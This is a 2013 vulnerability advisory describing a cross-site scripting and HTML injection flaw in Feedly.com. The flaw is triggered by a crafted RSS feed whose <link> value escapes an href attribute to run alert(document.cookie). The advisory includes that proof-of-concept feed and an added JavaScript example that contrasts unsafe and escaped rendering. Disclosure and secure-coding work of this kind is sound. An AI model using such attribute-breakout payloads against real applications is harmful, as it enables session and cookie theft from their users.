Feedly.com suffers from a cross-site scripting vulnerability that can be injected via a malicious RSS feed.
* Feedly.com HTML Injection and XSS Vulnerability RSS feed
* ========================================================
*
* Site: http://feedly.com
* Discovered by: Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
* Follow me: http://www.linkedin.com/in/andreamenin
*
* ========================================================
Report-Timeline:
----------------
2013-07-02: Reported to domain's tech contact
Introduction:
-------------
Feedly.com is an RSS feed reader. Once you sign up (local account
or Google auth), you can add RSS feeds from your preferred web sites,
including by typing a feed URL.
Description:
------------
I found this XSS vulnerability and HTML injection by adding a fake RSS feed
with a JavaScript "injection" inside the <link> tag. I've seen that Feedly.com
doesn't escape/sanitize the "quotes" inside this tag...
so, I've put something like this:
<link>http://www.bla.l33t/" onmouseover="alert(document.cookie)">bla</a></link>
Full RSS "Exploit" with injection on tag <link>:
------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
<channel>
<item>
<title>Test XSS Vulnerability</title>
<link>http://www.bla.l33t/" onmouseover="alert(document.cookie)">bla</a></link>
<pubDate>Sun, 2 Jul 2013 22:56:41 GMT</pubDate>
<description>XSS TEST, yuk!</description>
</item>
</channel>
</rss>
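
The rendering flaw described above next to a hardened version, as an added example (not Feedly's code and not part of the original advisory). It assumes the reader places the item's <link> text into the href attribute of an anchor; the function names are hypothetical.

```javascript
// Added example: rendering a feed item's <link> into an anchor.
// escapeHtml, safeHref, renderUnsafe and renderSafe are hypothetical names.

// Escape every character that can close an attribute value or open a tag.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Accept only absolute http(s) URLs; anything else becomes an inert "#".
// The URL parser also percent-encodes quotes, spaces and angle brackets in the path.
function safeHref(raw) {
  try {
    const u = new URL(String(raw).trim());
    return (u.protocol === "http:" || u.protocol === "https:") ? u.href : "#";
  } catch {
    return "#";
  }
}

// The pattern the advisory describes: feed text concatenated into href unescaped.
function renderUnsafe(item) {
  return '<a href="' + item.link + '">' + item.title + "</a>";
}

// Hardened: validate the scheme, then escape for attribute and text context.
function renderSafe(item) {
  return '<a href="' + escapeHtml(safeHref(item.link)) +
    '" rel="noopener noreferrer">' + escapeHtml(item.title) + "</a>";
}

// Constructed sample: the <link> text from the feed above, as a lenient
// feed parser would hand it to the renderer.
const sampleItem = {
  title: "Test XSS Vulnerability",
  link: 'http://www.bla.l33t/" onmouseover="alert(document.cookie)">bla</a>',
};

console.log(renderUnsafe(sampleItem)); // quote closes href, handler becomes an attribute
console.log(renderSafe(sampleItem));   // quote is encoded, the whole value stays inside href
```

Escaping alone closes the attribute break-out; the scheme check is a second layer for feed links that are not http(s) URLs at all.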
Screenshot XSS Vulnerability:
-----------------------------
http://goo.gl/fs2Vg
CREDITS:
---------
These vulnerabilities have been discovered
by Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
LEGAL NOTICES:
---------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.